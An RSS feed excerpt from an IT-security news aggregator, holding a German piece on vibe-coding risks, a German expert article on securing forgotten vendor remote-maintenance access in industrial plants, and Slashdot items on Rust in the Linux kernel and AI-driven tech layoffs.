<p class="wp-block-paragraph">Trotz der genannten Vorteile birgt der Vibe-Coding-Ansatz auch diverse Risiken mit Blick auf die Wartbarkeit und Anfälligkeit der generierten Logik. So warnt etwa ShadowDragon-Managerin Mortlock: “<a href="https://www.computerwoche.de/article/4155663/6-wege-uber-ki-gehackt-zu-werden.html" target="_blank">Sicherheitslücken</a> und <a href="https://www.computerwoche.de/article/3980660/technische-schulden-als-billige-ausrede.html" target="_blank">technische Schulden</a> sind die Hauptprobleme in Zusammenhang mit Vibe Coding. KI kann manchmal unsichere Pattern oder auch veraltete Bibliotheken einbinden.”</p>



<p class="wp-block-paragraph">Zudem sei KI-generierter Code in den meisten Fällen auch länger, was das Debugging langwierig und mühsam gestalten könne, erklärt Mortlock. Sie fügt hinzu: “KI verweist unter Umständen auch auf nicht existierende Packages, was auch böswillige Akteure ausnutzen könnten. Was wie funktionierender Code aussieht, kann versteckte Fallen bergen.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/charlesjiama/" target="_blank" rel="noreferrer noopener">Charles Ma</a>, Software Engineer beim Observability-Spezialisten Chronosphere, sieht ein weiteres Problem, das die Angriffsfläche potenziell vergrößert: “Selbst erfahrene Engineers können selbstzufrieden werden und dann Probleme übersehen, die ihnen sonst nicht entgangen wären. Sobald KI-Tools mit externen Systemen verbunden sind oder Websuchen durchführen, besteht außerdem das Risiko von Prompt Injections und Toolchain-Exploits.”</p>



<p class="wp-block-paragraph">Infrastruktur-Profi Pardalis fokussiert mit Blick auf die Risiken von Vibe Coding vor allem die Bereiche Volatilität und Sichtbarkeit: Weil dieser Ansatz für schnelle Iterationen und Modellautonomie förderlich sei, bestünden die Hauptrisiken in unkontrollierter Variabilität und undurchsichtigen Quellen. Um diese Probleme zu bekämpfen, appelliert Pardalis für:</p>



<ul class="wp-block-list">
<li><strong>Lineage Tracking</strong>: Jede Version wird committet und verwendet Frameworks mit integrierter Traceability.</li>



<li><strong>Evaluierungsschleifen</strong>: Qualitäts- und Regressionsprüfungen werden automatisiert durchgeführt.</li>



<li><strong>Governance-Layer</strong>: Prompt-Historien werden auditiert und sensible Daten gefiltert.</li>
</ul>



<p class="wp-block-paragraph">Der Engineering-Profi ist der Ansicht, dass eine expressive, modellgesteuerte Softwareentwicklung und eine deterministische Infrastruktur unter disziplinierten Rahmenbedingungen koexistieren können: “Letztendlich verspricht Vibe Coding kein Chaos, sondern strukturierte Kreativität. Sie entwickeln Ideen schnell, setzen sie aber sicher um. Mit anderen Worten: Freiheit am Anfang, Disziplin im weiteren Verlauf – so kann Vibe Coding tatsächlich in Produktionsumgebungen skaliert werden.”</p>



<h2 class="wp-block-heading">6 Tipps für effektives Vibe Coding</h2>



<p class="wp-block-paragraph">Da Sie nun umfassend über alle Aspekte des Vibe-Coding-Ansatzes informiert sind, geben wir Ihnen abschließend noch ein paar Tipps an die Hand, um Ihre eigene Initiative erfolgreich umzusetzen. Diese haben wir aus unseren Gesprächen mit den im Artikel zitierten Spezialisten zum Thema extrahiert</p>



<ul class="wp-block-list">
<li><strong>Beginnen Sie mit Zielen, nicht mit Funktionen:</strong> Beschreiben Sie zunächst die gewünschte <a href="https://www.computerwoche.de/article/2834420/der-niedergang-des-user-interface.html" target="_blank">User Experience</a> und die wesentlichen Geschäftsprobleme, die mit der Initiative gelöst werden sollen. Dabei müssen Sie es nicht übertreiben und jeden Button oder Screen definieren – für relevante Lösungen ist es entscheidend, der KI so genau wie möglich zu beschreiben, was erreicht werden soll.</li>



<li><strong>Planen Sie voraus:</strong> Vibe Coding ist nicht in der Lage, eine gute Architektur zu ersetzen. Bevor Sie KI hinzuziehen, sollten Sie deshalb sicherstellen, dass Design und Spezifikationen stimmen. Das erleichtert es der KI, “Intent” in kohärente Systeme zu übersetzen.  </li>



<li><strong>Verstehen Sie KI als Partner: </strong>Es gilt, mit Vibe-Coding-Tools zu kollaborieren. Diese Werkzeuge brauchen Anleitung und ihre Ergebnisse müssen überprüft werden. Blindes Vertrauen kann an dieser Stelle<a href="https://www.computerwoche.de/article/3829267/so-bleibt-ihr-code-halluzinationsfrei.html" target="_blank"> kontraproduktiv sein</a>. Sie sollten deshalb nicht zögern, die KI-generierte Logik in Frage zu stellen.</li>



<li><strong>Nutzen Sie Frameworks, Kontext und Beispiele:</strong> Etablierte Frameworks zu nutzen, erspart es Ihnen alles von Grund auf neu zu entwickeln. Die KI mit Beispielanwendungen zu füttern oder (<a href="https://www.computerwoche.de/article/4143599/mcp-server-5-tipps-fur-die-praxis.html" target="_blank">vertrauenswürdige</a>) MCP-Server hinzuzuziehen, um Kontext in größeren Projekten zu managen, kann ihre Fähigkeiten erweitern.  </li>



<li><strong>Halten Sie Menschen – und Security – im Loop:</strong> Setzen Sie auch bei Vibe- respektive KI-Coding-Tools auf das Least-Privilege-Prinzip – und Review-Prozesse. Engineering Best Practices anzuwenden, empfiehlt sich ebenfalls: Generieren Sie Tests, verifizieren Sie Funktionalitäten. Und betrachten Sie die Tools als Kreativitäts- und Produktivitäts-Support. Nicht als Substitut für <a href="https://www.computerwoche.de/article/2834999/3-dinge-die-senior-developer-auszeichnen.html" target="_blank">Skills und Knowhow</a>.</li>



<li><strong>Iterieren und verfeinern Sie: </strong>Nehmen Sie mit Blick auf Vibe Coding Abstand vom Streben nach Perfektion (auch wenn es Ihnen <a href="https://www.computerwoche.de/article/4048410/was-junior-entwickler-von-the-bear-lernen-konnen.html" target="_blank">widerstrebt</a>) und finden Sie sich möglichst frühzeitig mit unvollkommenen Ergebnissen ab. Tracken Sie Prompts, cachen Sie Checkpoints und verfeinern Sie die Ergebnisse – solange, bis der “Flow” zu einer zuverlässigen Funktionalität wird.</li>
</ul>



<p class="wp-block-paragraph">(fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Artikel ist <a href="https://www.infoworld.com/article/4078884/what-is-vibe-coding-ai-writes-the-code-so-developers-can-think-big.html" target="_blank">im Original</a> bei unserer Schwesterpublikation Infoworld.com erschienen.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Der vergessene Fernwartungszugang]]></title>
<description><![CDATA[Wenn ein Security-Vorfall die industrielle Produktion lahmlegt, könnte ein verwaister Zugang für Drittanbieter der Grund sein.Nopphon_1987 | shutterstock.com



Wenn ich in einer historisch gewachsenen Industrieanlage eine Bestandsaufnahme der Fernzugänge durchführe, begegnen mir immer wieder die...]]></description>
<link>https://tsecurity.de/de/3680297/it-security-nachrichten/der-vergessene-fernwartungszugang/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680297/it-security-nachrichten/der-vergessene-fernwartungszugang/</guid>
<pubDate>Mon, 20 Jul 2026 07:54:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Nopphon_1987-shutterstock_1721539840_16z9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="OT Security 16z9" class="wp-image-4195048" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Wenn ein Security-Vorfall die industrielle Produktion lahmlegt, könnte ein verwaister Zugang für Drittanbieter der Grund sein.</figcaption></figure><p class="imageCredit">Nopphon_1987 | shutterstock.com</p></div>



<p class="wp-block-paragraph">Wenn ich in einer historisch gewachsenen <a href="https://www.computerwoche.de/article/4186901/der-blinde-fleck-der-europaischen-industrie.html" target="_blank">Industrieanlage</a> eine Bestandsaufnahme der Fernzugänge durchführe, begegnen mir immer wieder dieselben Artefakte:</p>



<ul class="wp-block-list">
<li>der VPN-Tunnel des Maschinenherstellers aus dem Projekt von vor acht Jahren,</li>



<li>der Mobilfunkrouter im Schaltschrank, an dessen Bestellung sich niemand mehr erinnert oder</li>



<li>das Fernwartungs-Tool auf der Engineering-Workstation, dessen Lizenz noch auf einen längst ausgeschiedenen Servicetechniker läuft.</li>
</ul>



<p class="wp-block-paragraph">Bislang habe ich Bestandsaufnahmen dieser Art in der Energiewirtschaft, der Fertigungsbranche und der Pharmaindustrie begleitet – und noch keine erlebt, die keinen vergessenen Zugang zutage gefördert hätte. Diese wurden nicht mit bösen Hintergedanken eingerichtet, sondern lösten einst ein reales Verfügbarkeitsproblem. Heute bieten sie allerdings unbeaufsichtigten Zugang zu Produktionssystemen.</p>



<p class="wp-block-paragraph">In diesem Beitrag vermittle ich warum Zugänge dieser Art trotz aller Warnungen oft „überleben“ – und an welchem Punkt die Infrastrukturbetreiber ansetzen können, um das künftig zu ändern.</p>



<h2 class="wp-block-heading">Darum überleben industrielle Hintertüren</h2>



<p class="wp-block-paragraph">Dass das eben beschriebene Szenario nicht bloß theoretischer Natur ist, lässt sich auch mit harten Zahlen unterfüttern: Laut dem aktuellen SANS-Whitepaper „<a href="https://www.sans.org/white-papers/state-of-ics-ot-security-2025" target="_blank" rel="noreferrer noopener">State of ICS/OT Security</a>“ (Download gegen Daten) bildeten nicht-autorisierte externe Zugriffe (häufig über Remote-Wartungskanäle für Dienstleister) den Startpunkt für rund <strong>50 Prozent</strong> aller Sicherheitsvorfälle in Industrieumgebungen. Gleichzeitig fördert die Erhebung auch zutage, dass weniger als <strong>15 Prozent</strong> der Infrastrukturbetreiber über robuste Remote-Access-Kontrollen verfügen.</p>



<p class="wp-block-paragraph">Hinzu kommt noch regulatorischer Druck: Seit Anfang Dezember 2025 ist das <a href="https://www.bsi.bund.de/DE/Service-Navi/Presse/Pressemitteilungen/Presse2025/251205_NIS-2-Umsetzungsgesetz_in_Kraft.html" target="_blank" rel="noreferrer noopener">NIS-2-Umsetzungsgesetz</a> ohne Übergangsfrist in Kraft. Dieses verpflichtet rund 30.000 <a href="https://www.bsi.bund.de/DE/Themen/Regulierte-Wirtschaft/NIS-2-regulierte-Unternehmen/nis-2-regulierte-unternehmen_node.html" target="_blank" rel="noreferrer noopener">regulierte Organisationen</a> in Deutschland ausdrücklich dazu, ihre Lieferketten abzusichern, Access-Control-Konzepte zu entwickeln und durchzusetzen sowie Multi-Faktor-Authentifizierung zu nutzen. Für die Umsetzung dieser Maßnahmen haftet die Geschäftsleitung persönlich. Ein Fernwartungszugang für Drittanbieter liegt in der Schnittmenge der genannten Pflichten – und ist damit kein Maintenance-Nischenthema mehr, sondern ein Prüfstein für <a href="https://www.computerwoche.de/article/3995000/wie-sie-den-compliance-durchblick-behalten.html" target="_blank">Compliance</a>.</p>



<p class="wp-block-paragraph">Wenn ich die Verantwortlichen im Unternehmen ganz direkt frage, warum so ein Tunnel für Dienstleister immer noch offen ist, höre ich selten Ausreden. Genannt werden vor allem vier strukturelle Begründungen.  </p>



<ul class="wp-block-list">
<li><strong>Die Gewährleistungskopplung:</strong> Viele Hersteller knüpfen Garantien – etwa bezüglich Reaktionszeiten – daran, dass ihre eigenen Standards für die Fernwartung genutzt werden.</li>



<li><strong>Die Machtasymmetrie:</strong> Ein einzelner Betreiber verhandelt mit einem globalen Maschinenbauer, dessen Servicebedingungen für Hunderte von Kunden identisch sind.</li>



<li><strong>Die Brownfield-Realität:</strong> Die Zugänge sind über Jahre in Einzelprojekten entstanden, die Verantwortung diffundiert zwischen Instandhaltung, IT und Einkauf – niemand fühlt sich zuständig.</li>



<li><strong>Die Verfügbarkeitslogik: </strong>Der offene Tunnel wirkt wie eine Versicherung gegen Stillstand. Das Cyberrisiko ist abstrakt, der Produktionsausfall konkret – und über die Kennzahlen des Werksleiters entscheidet der Ausfall, nicht das Audit.</li>
</ul>



<p class="wp-block-paragraph">Ein Absicherungskonzept, das diese Kräfte ignoriert, bleibt Papier. Deshalb ordne ich die Maßnahmen in meinen Projekten bewusst so an: Transparenz zuerst, dann Vertrag, Technik und schließlich Betrieb.</p>



<h2 class="wp-block-heading">Industrielle Access-Hygiene in der Praxis</h2>



<p class="wp-block-paragraph">Dabei beginne ich mit einer Liste, die darüber Auskunft gibt, wer aktuell aus welchem Grund Zugriff über welchen Kanal hat und seit wann. Die Quellen sind dabei unspektakulär: Firewall-Regelwerke, VPN-Konten, externe Accounts im Verzeichnisdienst, Mobilfunkverbindungen in Schaltschränken, installierte Fernwartungs-Tools. Ergänzend kommen Gespräche mit der Instandhaltung dazu, denn ein erheblicher Teil der Zugänge existiert nur in Köpfen, nicht in Dokumenten. Im Ergebnis steht ein Zugangsregister mit Eigentümer, Zweck, Zugriffspfad und Befristung. Accounts für die sich kein interner Eigentümer findet, werden nach Ablauf einer definierten Einspruchsfrist abgeschaltet. Das betrifft im Regelfall einen zweistelligen Prozentsatz der bestehenden Zugänge. In diesen Fällen „kostet“ es also lediglich eine Abstimmungsrunde, um die <a href="https://www.computerwoche.de/article/2803348/was-ist-risk-management.html" target="_blank">Risiken zu reduzieren</a>.</p>



<p class="wp-block-paragraph">Für das was übrig bleibt, gilt der Grundsatz Anforderungen vor Zugang. Bevor ein solcher eingerichtet wird, müssen Leistungsumfang und Vertraulichkeit geregelt werden. Bei missionskritischen Zulieferern oder Dienstleistern sollten zudem zusätzlich Security-Anforderungen auch vertraglich festgelegt werden. Zwei Details machen dabei den Unterschied zwischen belastbaren und symbolischen Verträgen:</p>



<ul class="wp-block-list">
<li>eine <strong>Vererbungspflicht</strong>, die dem Lieferanten auferlegt, dieselben Sicherheitskontrollen an seine Subunternehmer weiterzureichen, bevor diese Zugriff erhalten, und</li>



<li>ein <strong>definierter Ersatz für verweigerte Auditrechte</strong>, etwa unabhängige Prüfberichte, die der Dienstleister jährlich vorlegt. Statt eigene Kataloge zu erfinden, referenziere ich die IEC 62443-2-4, die genau diese Anforderungen an Service-Provider normiert.</li>
</ul>



<p class="wp-block-paragraph">Bei Richtlinienprüfungen werfe ich zuerst einen Blick auf ein unscheinbares Detail: das Modalverb. Denn in den Regelwerken, die ich in den vergangenen Jahren für Energie-, Industrie- und Pharmaunternehmen geprüft oder mitgeschrieben habe, definiert die Unterscheidung zwischen „muss“ und „sollte“, wie die Realität aussieht: Ist die Befristung externer Konten als Muss-Regel mit automatischem Ablauf formuliert, verfallen die Konten tatsächlich. Wird dieselbe Anforderung als Empfehlung mit Jahresfrist festgehalten, finden sich beim nächsten <a href="https://www.computerwoche.de/article/4149093/wenn-die-audit-falle-zuschnappt.html" target="_blank">Audit</a> dieselben Karteileichen wie bei dem zuvor. Oder anders formuliert: Im ersten Fall wirkt das Regelwerk, im zweiten ist es lediglich Dekoration.</p>



<p class="wp-block-paragraph">An dieser Stelle begegnet mir immer wieder das hartnäckige Gegenargument, dass ohne den Standard-Remote-Zugang die Gewährleistung erlischt. Dieses Problem lässt sich in meiner Erfahrung auf drei verschiedene Weisen lösen:</p>



<ul class="wp-block-list">
<li><strong>Verhandlungsfenster nutzen:</strong> Neubeschaffung, Retrofit und die Verlängerung von Serviceverträgen sind die Momente, in denen sich Anforderungen durchsetzen lassen.</li>



<li><strong>Rechtslage neu bewerten:</strong> Der Betreiber ist gesetzlich dazu verpflichtet, seine Lieferkette abzusichern. Ein Standardzugang, der dem entgegensteht, stellt insofern ein rechtliches Risiko dar – zunehmend auch für den Hersteller, der als Teil der Lieferkette in den Pflichtenkreis seiner Kunden rückt.</li>



<li><strong>Kompensieren, wo sich nichts durchsetzen lässt:</strong> Ein Fernwartungszugang ließe sich beispielsweise auf ein betreibereigenes Gateway beschränken, das standardmäßig von den Produktionssystemen getrennt ist und gesondert überwacht wird. Entscheidend ist an dieser Stelle, dass eine Risikoentscheidung getroffen und dokumentiert wird – statt den Status Quo weiter still zu dulden.</li>
</ul>



<p class="wp-block-paragraph">Technisch folgt der Rest dem Single-Channel-Prinzip: Alle externen Zugriffe laufen über eine dedizierte Fernwartungs-DMZ und gehärtete Sprungserver. Direkte RDP-, SSH- oder VNC-Logins in OT-Systeme sind ebenso tabu wie herstellereigene Parallelwege über Cloud-Portale oder mitgebrachte Mobilfunkrouter. <a href="https://www.computerwoche.de/article/4153147/7-sicherheitsmasnahmen-die-viel-bringen-aber-wenig-kosten.html" target="_blank">Multi-Faktor-Authentifizierung</a> ist gesetzt. Derselbe Grundsatz gilt für On-Premises-Zugänge: Dienstleister-Devices, -Modems, und -Smartphones müssen draußen bleiben, USB-Ports sind standardmäßig deaktiviert. In OT-Umgebungen sollten ausschließlich dedizierte, betreibereigene Engineering-Devices zum Einsatz kommen.</p>



<p class="wp-block-paragraph">Sammelkonten wie „Service“ oder „Wartung“ ersetze ich dabei durch personalisierte Kennungen im Verzeichnisdienst des Betreibers – nur so entstehen Zurechenbarkeit und die Möglichkeit für ein sauberes Offboarding. Reife heißt dabei nicht null Ausnahmen, sondern Ausnahmen mit Preisschild: Wo ein Altsystem technisch keine individuellen Konten unterstützt, sollten gute Regelwerke ein lückenloses Zugriffsprotokoll generieren, das jede einzelne Anmeldung einer physischen Person zuordnet und eine Genehmigung durch das Security-Team erfordert. Der Default-Zustand ist dann bei jedem Zugang grundsätzlich „deaktiviert“. Aktiviert wird er je nach Einsatzzweck durch den Asset Owner – inklusive definiertem Zeitfenster für den Zugang, das an die Vertragslaufzeit gekoppelt ist. </p>



<p class="wp-block-paragraph">Die konsequentesten Umsetzungen, die mir begegnet sind, gehen noch einen Schritt weiter: Externe Konten verfallen dort automatisch nach sechs Monaten und brauchen eine aktive Neugenehmigung. Privilegierte Zugänge werden zusätzlich halbjährlich rezertifiziert – in Hochrisikozonen durch eine unabhängige Stelle. Und: Nach 90 Tagen Inaktivität wird jeder Account automatisch gelöscht. Das sorgt für eine „Beweislastumkehr“: Nicht die Sperrung eines Kontos muss dann begründet werden, sondern dessen Fortbestand.</p>



<p class="wp-block-paragraph">Auch an dieser Stelle begegnen mir regelmäßig zweierlei Einwände:</p>



<ol class="wp-block-list">
<li><strong>„Was passiert bei der Störung am Samstagabend, wenn kein Asset Owner erreichbar ist?“</strong> – die Antwort ist ein Break-Glass-Prozess – eine vordefinierte Notfallfreigabe durch die Leitwarte oder Rufbereitschaft, eng befristet, mit automatischer Alarmierung, verpflichtender Sitzungsaufzeichnung und nachträglicher Genehmigung binnen 24 Stunden. Eine besonders elegante Lösung: Regelwerke, die Notfallrechte temporär der persönlichen Kennung des Technikers zuweisen statt einem anonymen Notfallkonto – die Zurechenbarkeit bleibt erhalten – und wo dedizierte Notfallkonten unvermeidbar sind, liegen sie in einem Passwort-Tresor, dessen Öffnung selbst wieder Authentifizierung und Protokoll erzwingt. Ohne diesen Prozess scheitert jedes Just-in-Time-Modell an der ersten Nachtschicht, die es umgeht.</li>



<li><strong>„Unsere Altsysteme können kein MFA.“</strong> – das müssen sie auch nicht, die Kontrolle wandert an den Rand. Identitätsprüfung und MFA werden am Sprungserver erzwungen, das Altsystem sieht nur dessen Sitzung. Die Systempasswörter liegen im Kennwort-Tresor eines Privileged-Access-Management-Systems und werden dem Techniker nie angezeigt, sondern automatisch in die Sitzung injiziert. Das entschärft nebenbei das Problem, dass Gerätepasswörter den Dienstleister überleben, wenn dessen Techniker wechseln.</li>
</ol>



<p class="wp-block-paragraph">Bleibt die Beweisfähigkeit: Wer wann über welchen Weg auf welches System zugegriffen hat, muss über die Systeme des Betreibers nachweisbar sein – im eigenen <a href="https://www.computerwoche.de/article/3835828/siem-kaufratgeber.html" target="_blank">SIEM</a>, nicht in den Protokollen des Dienstleisters. Und Protokollierung meint dabei mehr, als lediglich An- und Abmeldungen zu erfassen: Erst wenn Befehle, Dateizugriffe und Parameteränderungen innerhalb der Sitzung erfasst werden, weiß man mehr, als dass „sich jemand eingeloggt“ hat. Die konsequentesten Regelwerke machen Admin-Protokolle für den Administrator selbst unveränderbar und überwachen das PAM-System seinerseits per SIEM – da ansonsten niemand mehr das Tool kontrolliert, das alles andere kontrolliert.</p>



<p class="wp-block-paragraph">Kommt es zu einem Sicherheitsvorfall, müssen Betreiber, die auf Logs der Gegenseite angewiesen sind, aus der Defensive heraus verhandeln. Angesichts der persönlichen Haftung des Managements ist das kein forensisches Detail, sondern Selbstschutz. Am (Vertrags-)Ende steht dann schließlich noch der richtige Rückbau: Konten müssen deaktiviert, temporäre Firewall-Regeln entfernt sowie Token und Zertifikate deprovisioniert werden – gekoppelt an den Lieferantenstatus im Einkaufssystem, nicht an eine manuelle E-Mail. Der häufigste Befund in Access-Audits sind aktive Konten aus längst beendeten Verträgen.</p>



<h2 class="wp-block-heading">OT-Risiken reduzieren mit dem 4-Stufen-Ansatz</h2>



<p class="wp-block-paragraph">Fünfzehn Maßnahmen parallel zu fahren, dürfte nahezu jede Organisation überfordern. Ich priorisiere die Risikoreduktion nach Aufwand in vier Stufen:</p>



<ul class="wp-block-list">
<li><strong>Stufe 1</strong> sieht die Inventur und die Abschaltung von Zugängen ohne Eigentümer vor. Das gewährleistet eine hohe Wirkung bei gleichzeitig geringem Aufwand – auch zeitlich, denn das ist in Wochen umsetzbar.</li>



<li><strong>Stufe 2</strong> verlangt einen zentralen Zugriffskanal mit DMZ, Sprungservern und ausnahmsloser MFA vor. Auch hier steht im Ergebnis eine hohe Wirkung – bei mittlerem Aufwand. Die Umsetzungszeit liegt im Bereich von Monaten.</li>



<li><strong>Stufe 3</strong> setzt einen Just-in-Time-Freigabeprozess mit Befristung und Break-Glass-Verfahren voraus. Hier ist der Aufwand vor allem organisatorischer Natur.</li>



<li><strong>Stufe 4</strong> erfordert ein PAM mit Kennwort-Tresor, Sitzungsaufzeichnung und SIEM-Anbindung. Das gewährleistet Nachweisbarkeit und Auditreife. Wie groß der Abstand zwischen Anspruch und Realität gerade hier ist, verdeutlicht ebenfalls ein Blick in die vorgenannte SANS-Erhebung: Demnach haben nur circa <strong>13 Prozent</strong> der Infrastruktubetreiber Session-Aufzeichnungen und Echtzeit-Freigaben vollständig implementiert.</li>
</ul>



<p class="wp-block-paragraph">Mein Fazit nach diversen Projekten dieser Art: Ein Dienstleisterzugang stellt keinen Zustand dar, sondern braucht einen Lebenszyklus – er muss beantragt, befristet, überwacht und zurückgebaut werden. Die Technik dafür ist seit Jahren verfügbar. Wer heute mit der Access-Inventur beginnt und den zentralen Kanal konsequent durchsetzt, kann bereits mit der Umsetzung von Stufe 1 und 2 einen Großteil der Risiken reduzieren – und parallel Compliance sicherstellen.</p>



<p class="wp-block-paragraph">Wie sich diese Bausteine zu einem vollständigen <a href="https://www.computerwoche.de/article/3495826/iso-und-isms-darum-gehen-security-zertifizierungen-schief.html" target="_blank">ISMS</a> für die Industrie zusammenfügen lassen, lesen Sie in ausführlicher Form in meinem Praxisratgeber, der im September bei Springer Vieweg erscheint. (fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Beitrag wurde im Rahmen des deutschsprachigen Experten-Netzwerks von Foundry veröffentlicht. Lust mitzumachen? </strong><a href="https://www.computerwoche.de/experten/" target="_blank"><strong>Jetzt bewerben</strong></a><strong>!</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rust Will Help Linux Succeed and Makes Coding Fun, Says Greg Kroah-Hartman]]></title>
<description><![CDATA[ZDNet reports on June's Open Source Summit India 2026 in Mumbai, where Linux stable kernel maintainer Greg Kroah-Hartman gave a talk titled "Rust and Linux: How the Rust Language is Going to Help Linux Succeed."




 Kroah-Hartman said in his keynote that "the [Linux] kernel is moving toward Rust...]]></description>
<link>https://tsecurity.de/de/3680295/it-security-nachrichten/rust-will-help-linux-succeed-and-makes-coding-fun-says-greg-kroah-hartman/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680295/it-security-nachrichten/rust-will-help-linux-succeed-and-makes-coding-fun-says-greg-kroah-hartman/</guid>
<pubDate>Mon, 20 Jul 2026 07:54:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ZDNet reports on June's Open Source Summit India 2026 in Mumbai, where Linux stable kernel maintainer Greg Kroah-Hartman gave a talk titled "Rust and Linux: How the Rust Language is Going to Help Linux Succeed."




 Kroah-Hartman said in his keynote that "the [Linux] kernel is moving toward Rust. Git is moving toward Rust. Lots of projects are starting to move toward Rust."
 

He didn't always feel that way. Kroah-Hartman added, "A number of years ago, when a friend of mine said, 'Ah, you got to try this new language. It's called Rust.' I was like, 'What? No, C is great.' His friend continued, "'No, no, no! It makes programming fun again.' I'm like, 'Nah, programming is fun in C.' He was right. I should have done it then. Rust is actually fun. It makes programming fun. It takes a lot of stuff away from having to worry about the compiler, which can fix a lot of your problems for you, and it makes code a little bit better." 

So, Kroah-Hartman has moved from being a Rust skeptic to one of its strongest champions inside the kernel. He now regards Rust as a permanent part of Linux, not an experiment. His case is straightforward: Rust's ownership and type system can eliminate most of the "stupid little tiny things" that dominate kernel Common Vulnerabilities and Exposures (CVEs), while making life easier for overworked maintainers. "Rust," in short, "makes my life so much easier...." In India, he said Linux sees "about 13 CVEs a day" and has been running at "almost nine changes an hour" for a decade or more. Most of those vulnerabilities, he argued, are not exotic attacks but simple C mistakes — unchecked pointers, forgotten unlocks, and sloppy cleanup paths: "This is what we're fixing 13 times a day. Small, trivial, little bugs like this all the time.... I've seen every CVE the kernel has done in the past 25 years. I think 80% would be gone, just because they would be caught by Rust." The remaining 20% are the logic bugs he'd prefer to focus on...." 

 Moreover, Rust is becoming the default for new work in key subsystems. "New drivers for some subsystems are only going to be accepted in Rust...." he said. Binder, the Android IPC mechanism at the heart of billions of devices, now has parallel C and Rust implementations in the kernel. The C version "will go away soon," leaving the Rust version "as the bedrock of all Android devices going forward."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Rust+Will+Help+Linux+Succeed+and+Makes+Coding+Fun%2C+Says+Greg+Kroah-Hartman%3A+https%3A%2F%2Fdevelopers.slashdot.org%2Fstory%2F26%2F07%2F20%2F0417244%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fdevelopers.slashdot.org%2Fstory%2F26%2F07%2F20%2F0417244%2Frust-will-help-linux-succeed-and-makes-coding-fun-says-greg-kroah-hartman%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://developers.slashdot.org/story/26/07/20/0417244/rust-will-help-linux-succeed-and-makes-coding-fun-says-greg-kroah-hartman?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[As AI Transforms Silicon Valley, Some Tech Workers Face Evaporating Financial Security]]></title>
<description><![CDATA[The Washington Post describes a mid-tier executive at Meta as one of Silicon Valley's "winners" whose financial security suddenly "evaporated" as their workforce "pushed headlong into AI and heavy job cuts," creating a transformed job market. "Her ex-husband, a designer at Meta who was laid off i...]]></description>
<link>https://tsecurity.de/de/3680218/it-security-nachrichten/as-ai-transforms-silicon-valley-some-tech-workers-face-evaporating-financial-security/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680218/it-security-nachrichten/as-ai-transforms-silicon-valley-some-tech-workers-face-evaporating-financial-security/</guid>
<pubDate>Mon, 20 Jul 2026 05:54:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Washington Post describes a mid-tier executive at Meta as one of Silicon Valley's "winners" whose financial security suddenly "evaporated" as their workforce "pushed headlong into AI and heavy job cuts," creating a transformed job market. "Her ex-husband, a designer at Meta who was laid off in 2020, eventually gave up looking for jobs in his profession. He now lifts boxes at a warehouse."


Layoffs.fyi, which tracks announced job cuts, counts more than 800,000 tech workers laid off since 2022, including large staff reductions in recent months at Meta, Microsoft, Oracle and Amazon... "There's this whole tranche of people who've been quite used to being among the most upwardly mobile in society who are all of a sudden saying, 'Now I'm the guy on the streetâs'" said Oliver Raskin, who founded Silicon Valley market research consultancy Signalcraft Insights and has surveyed attitudes in the tech labor force... "The rise of AI, especially, is bound to change the workplace radically," [said Georgetown University historian Joseph McCartin]. "But the way it's going to happen is similar to how technology transformed the auto industry." Ruth Milkman, a labor sociologist at the City University of New York, said that technology workers are getting a dose of what workers in other industries have long complained about: jobs that feel unsteady or rob them of autonomy. "Low-wage workers are used to it," she said... 

Many layoffs at technology companies are probably a hangover effect from over-hiring in prior years, experts say. And they don't account for a spotty recent increase in hiring in the information industry, which includes employment of software developers and jobs in media and entertainment. Digging deeper, though, some economists say there are signs that Silicon Valley and other technology-reliant parts of the American economy have reached a turning point where they are growing without needing as many people. The notion was encapsulated in a recent talk that ricocheted through group chats across the tech industry: In it, a partner at the start-up incubator Y Combinator heralded a new generation of AI-first companies that will only need human labor for "novel situations," "ethical considerations" and "high-stakes moments." 

Gad Levanon, chief economist at the labor research nonprofit Burning Glass Institute, said that the number of hours worked in the information sector has dipped since 2022, while the sector's economic output has increased by about 8 percent a year — more than three times the overall growth rate of the U.S. economy. He says the data reveals a sea change in industries, including technology and finance, toward doing more work with the same or fewer people — one that is spreading to other professional classes. "That's the new reality for white-collar and tech-exposed work: output up, headcount flat or down," Levanon said... 

Raskin, who has worked in the tech world since the late '90s, said that even though the current moment feels unsettling to many, he's hopeful that it's an early chapter in an evolving story. "It's happened many times before," he said, "that something implodes and all these people lose jobs, but then that talent gets cycled into whatever the next thing is — into a new wave of prosperity." 

In the article tech entrepreneur Anil Dash quips that Silicon Valley techies are "are guinea pigs for what tech dudes want to do to everyone."<p></p><div class="share_submission">
